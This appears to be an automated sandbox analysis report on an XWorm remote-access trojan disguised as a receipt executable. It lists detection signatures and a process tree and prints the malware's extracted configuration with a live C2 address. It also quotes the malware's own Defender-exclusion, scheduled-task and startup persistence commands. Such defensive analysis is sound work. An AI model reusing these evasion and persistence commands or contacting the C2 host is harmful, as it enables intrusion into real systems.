Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Receipt-#202431029B.exe

Overview

General Information

Sample name:Receipt-#202431029B.exe
Analysis ID:1582779
MD5:5322ece916271ad6517a171be2a5a378
SHA1:a6e2f7e14a60a184a58b37a6aa1593210ebfa6bd
SHA256:4c839863452a16a4d99b13065cf93b09547d04b86ba649a8b40976122ff67a74
Tags:exenjratuser-julianmckein
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Receipt-#202431029B.exe (PID: 7552 cmdline: "C:\Users\user\Desktop\Receipt-#202431029B.exe" MD5: 5322ECE916271AD6517A171BE2A5A378)
    • powershell.exe (PID: 7740 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XetHVID.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8092 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7844 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Receipt-#202431029B.exe (PID: 8004 cmdline: "C:\Users\user\Desktop\Receipt-#202431029B.exe" MD5: 5322ECE916271AD6517A171BE2A5A378)
      • WerFault.exe (PID: 5368 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8004 -s 2132 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • XetHVID.exe (PID: 8064 cmdline: C:\Users\user\AppData\Roaming\XetHVID.exe MD5: 5322ECE916271AD6517A171BE2A5A378)
    • schtasks.exe (PID: 2004 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • XetHVID.exe (PID: 5260 cmdline: "C:\Users\user\AppData\Roaming\XetHVID.exe" MD5: 5322ECE916271AD6517A171BE2A5A378)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["154.39.0.150"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x87d5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x8872:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8987:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x8367:$cnc4: POST / HTTP/1.1
    00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x542c9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x54366:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x5447b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x53e5b:$cnc4: POST / HTTP/1.1
      00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        Click to see the 8 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        9.2.XetHVID.exe.2b7c8f4.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          9.2.XetHVID.exe.2b7c8f4.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x51d5:$str01: $VB$Local_Port
          • 0x51c6:$str02: $VB$Local_Host
          • 0x548a:$str03: get_Jpeg
          • 0x4eb3:$str04: get_ServicePack
          • 0x61f7:$str05: Select * from AntivirusProduct
          • 0x63f3:$str06: PCRestart
          • 0x6407:$str07: shutdown.exe /f /r /t 0
          • 0x64b9:$str08: StopReport
          • 0x648f:$str09: StopDDos
          • 0x6585:$str10: sendPlugin
          • 0x6723:$str12: -ExecutionPolicy Bypass -File "
          • 0x684c:$str13: Content-length: 5235
          9.2.XetHVID.exe.2b7c8f4.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6bd5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6c72:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6d87:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6767:$cnc4: POST / HTTP/1.1
          9.2.XetHVID.exe.2b7c8f4.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            9.2.XetHVID.exe.2b7c8f4.0.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x6fd5:$str01: $VB$Local_Port
            • 0x6fc6:$str02: $VB$Local_Host
            • 0x728a:$str03: get_Jpeg
            • 0x6cb3:$str04: get_ServicePack
            • 0x7ff7:$str05: Select * from AntivirusProduct
            • 0x81f3:$str06: PCRestart
            • 0x8207:$str07: shutdown.exe /f /r /t 0
            • 0x82b9:$str08: StopReport
            • 0x828f:$str09: StopDDos
            • 0x8385:$str10: sendPlugin
            • 0x8523:$str12: -ExecutionPolicy Bypass -File "
            • 0x864c:$str13: Content-length: 5235
            Click to see the 25 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", ProcessId: 7740, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", ProcessId: 7740, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Receipt-#202431029B.exe, ProcessId: 8004, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnk
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\XetHVID.exe, ParentImage: C:\Users\user\AppData\Roaming\XetHVID.exe, ParentProcessId: 8064, ParentProcessName: XetHVID.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp13D7.tmp", ProcessId: 2004, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", ProcessId: 7844, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Receipt-#202431029B.exe", ProcessId: 7740, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Receipt-#202431029B.exe", ParentImage: C:\Users\user\Desktop\Receipt-#202431029B.exe, ParentProcessId: 7552, ParentProcessName: Receipt-#202431029B.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp", ProcessId: 7844, ProcessName: schtasks.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["154.39.0.150"], "Port": 5200, "Aes key": "1987", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Notepab.exeReversingLabs: Detection: 73%
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeReversingLabs: Detection: 73%
            Multi AV Scanner detection for submitted file
            Source: Receipt-#202431029B.exeReversingLabs: Detection: 73%
            Source: Receipt-#202431029B.exeVirustotal: Detection: 43%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Notepab.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Receipt-#202431029B.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: 154.39.0.150
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: 5200
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: 1987
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: %AppData%
            Source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmpString decryptor: Notepab.exe
            Source: Receipt-#202431029B.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Receipt-#202431029B.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdbyhR source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb0 source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Users\user\Desktop\Receipt-#202431029B.PDB source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Accessibility.pdb` source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdbahz source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007523000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdblX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdbxX source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdbSHA256 source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: Microsoft.VisualBasic.pdbP source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Users\user\Desktop\RVYv.pdb, source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: mscorlib.pdb@ source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: n0C:\Windows\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbHH source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Xml.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: o.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: %%.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108966106.0000000007519000.00000004.00000020.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp, WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4100928252.0000000001227000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\RVYv.pdbpdbVYv.pdb@V source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RVYv.pdb source: Receipt-#202431029B.exe, XetHVID.exe.0.dr, Notepab.exe.8.dr
            Source: Binary string: System.Management.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Drawing.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: \??\C:\Windows\symbols\exe\RVYv.pdb source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: RVYv.pdb21-2246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32ine\Software\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: Receipt-#202431029B.exe, 00000008.00000002.4108966106.000000000752C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: Receipt-#202431029B.exe, 00000008.00000002.4108425940.00000000061DB000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER7DA9.tmp.dmp.20.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER7DA9.tmp.dmp.20.dr

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 154.39.0.150
            Yara detected Generic Downloader
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE
            Source: global trafficTCP traffic: 192.168.2.4:49735 -> 154.39.0.150:5200
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
            Source: unknownTCP traffic detected without corresponding DNS query: 154.39.0.150
